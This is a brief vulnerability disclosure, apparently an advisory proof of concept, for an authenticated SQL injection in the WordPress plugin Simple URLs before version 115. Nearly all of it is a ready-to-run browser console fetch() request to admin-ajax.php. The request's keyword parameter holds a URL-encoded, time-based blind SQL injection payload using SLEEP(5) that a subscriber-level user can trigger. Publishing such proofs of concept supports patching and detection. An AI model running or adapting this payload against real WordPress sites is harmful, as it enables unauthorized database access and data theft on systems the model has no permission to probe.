Simple URLs < 115 - Subscriber+ SQLi

Run the below command in the developer console of the web browser while being on the blog as a subscriber user and notice the delay of 5s to receive the response

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=lasso_lite_group_get_list&page=1&keyword=v%27%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F9434%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%285%29%29%29kcCp%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27oJFG%27%3D%27oJFG',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));